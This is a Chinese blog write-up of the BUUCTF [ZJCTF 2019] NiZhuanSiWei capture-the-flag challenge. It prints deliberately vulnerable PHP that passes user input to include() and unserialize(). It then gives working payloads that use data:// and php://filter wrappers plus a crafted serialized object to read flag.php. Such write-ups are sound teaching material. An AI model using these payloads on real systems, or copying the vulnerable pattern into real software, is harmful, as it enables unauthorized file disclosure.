热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

BUUCTF[ZJCTF2019]NiZhuanSiWei解题报告

本文详细解析了BUUCTF[ZJCTF2019]NiZhuanSiWei的解题过程,包括代码审计、PHP伪协议的使用以及反序列化漏洞的利用。

前言:本文旨在通过BUUCTF [ZJCTF 2019] NiZhuanSiWei这一题目,深入探讨代码审计及安全问题,帮助读者理解和掌握相关技术。




题目给出的PHP源码如下:

$text = $_GET['text'];
$file = $_GET['file'];
$password = $_GET['password'];
if (isset($text) && file_get_contents($text, 'r') === 'welcome to the zjctf') {
echo "
" . file_get_contents($text, 'r') . "
";
if (preg_match('/flag/', $file)) {
echo "Not now!";
exit();
} else {
include($file);
$password = unserialize($password);
echo $password;
}
} else {
highlight_file(__FILE__);
}
?>

该题目需要传递三个参数:text、file 和 password。

首先,我们需要使 text 参数的内容为 'welcome to the zjctf',可以使用 data 协议实现:

?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

接下来,我们需要处理 file 参数。直接访问 useless.php 并没有显示任何内容,因此可以使用 PHP 伪协议将其内容以 base64 编码形式读取:

?file=php://filter/read=convert.base64-encode/resource=useless.php

将上述两个参数结合,形成如下 payload:

?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

解码 base64 后的内容如下:

class Flag {
public $file;
public function __toString() {
if (isset($this->file)) {
echo file_get_contents($this->file);
echo "
";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>

从解码后的代码可以看出,如果能够成功调用 Flag 类,并设置其 $file 属性为 flag.php,则可以通过反序列化获取 flag。构造如下序列化字符串:

$a = new Flag();
$a->file = 'flag.php';
echo serialize($a);
// 序列化结果:O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最终的 payload 如下:

?text=data:text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

通过上述步骤,我们可以成功获取到 flag。

总结:本题主要考察了 PHP 伪协议的使用、data 协议传递数据以及反序列化漏洞的利用。希望本文能帮助大家更好地理解这些技术点。


推荐阅读
  • 本文详细介绍了Akka中的BackoffSupervisor机制,探讨其在处理持久化失败和Actor重启时的应用。通过具体示例,展示了如何配置和使用BackoffSupervisor以实现更细粒度的异常处理。 ... [详细]
  • 优化ListView性能
    本文深入探讨了如何通过多种技术手段优化ListView的性能,包括视图复用、ViewHolder模式、分批加载数据、图片优化及内存管理等。这些方法能够显著提升应用的响应速度和用户体验。 ... [详细]
  • 技术分享:从动态网站提取站点密钥的解决方案
    本文探讨了如何从动态网站中提取站点密钥,特别是针对验证码(reCAPTCHA)的处理方法。通过结合Selenium和requests库,提供了详细的代码示例和优化建议。 ... [详细]
  • 本文详细介绍了如何使用 Yii2 的 GridView 组件在列表页面实现数据的直接编辑功能。通过具体的代码示例和步骤,帮助开发者快速掌握这一实用技巧。 ... [详细]
  • 在前两篇文章中,我们探讨了 ControllerDescriptor 和 ActionDescriptor 这两个描述对象,分别对应控制器和操作方法。本文将基于 MVC3 源码进一步分析 ParameterDescriptor,即用于描述 Action 方法参数的对象,并详细介绍其工作原理。 ... [详细]
  • 本文介绍如何使用Objective-C结合dispatch库进行并发编程,以提高素数计数任务的效率。通过对比纯C代码与引入并发机制后的代码,展示dispatch库的强大功能。 ... [详细]
  • 本文介绍了如何利用JavaScript或jQuery来判断网页中的文本框是否处于焦点状态,以及如何检测鼠标是否悬停在指定的HTML元素上。 ... [详细]
  • 导航栏样式练习:项目实例解析
    本文详细介绍了如何创建一个具有动态效果的导航栏,包括HTML、CSS和JavaScript代码的实现,并附有详细的说明和效果图。 ... [详细]
  • 深入理解Tornado模板系统
    本文详细介绍了Tornado框架中模板系统的使用方法。Tornado自带的轻量级、高效且灵活的模板语言位于tornado.template模块,支持嵌入Python代码片段,帮助开发者快速构建动态网页。 ... [详细]
  • 1.如何在运行状态查看源代码?查看函数的源代码,我们通常会使用IDE来完成。比如在PyCharm中,你可以Ctrl+鼠标点击进入函数的源代码。那如果没有IDE呢?当我们想使用一个函 ... [详细]
  • 深入理解Cookie与Session会话管理
    本文详细介绍了如何通过HTTP响应和请求处理浏览器的Cookie信息,以及如何创建、设置和管理Cookie。同时探讨了会话跟踪技术中的Session机制,解释其原理及应用场景。 ... [详细]
  • 主要用了2个类来实现的,话不多说,直接看运行结果,然后在奉上源代码1.Index.javaimportjava.awt.Color;im ... [详细]
  • 前言--页数多了以后需要指定到某一页(只做了功能,样式没有细调)html ... [详细]
  • Android 渐变圆环加载控件实现
    本文介绍了如何在 Android 中创建一个自定义的渐变圆环加载控件,该控件已在多个知名应用中使用。我们将详细探讨其工作原理和实现方法。 ... [详细]
  • JavaScript中属性节点的类型及应用
    本文深入探讨了JavaScript中属性节点的不同类型及其在实际开发中的应用,帮助开发者更好地理解和处理HTML元素的属性。通过具体的案例和代码示例,我们将详细解析如何操作这些属性节点。 ... [详细]
author-avatar
佳臭臭_643
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有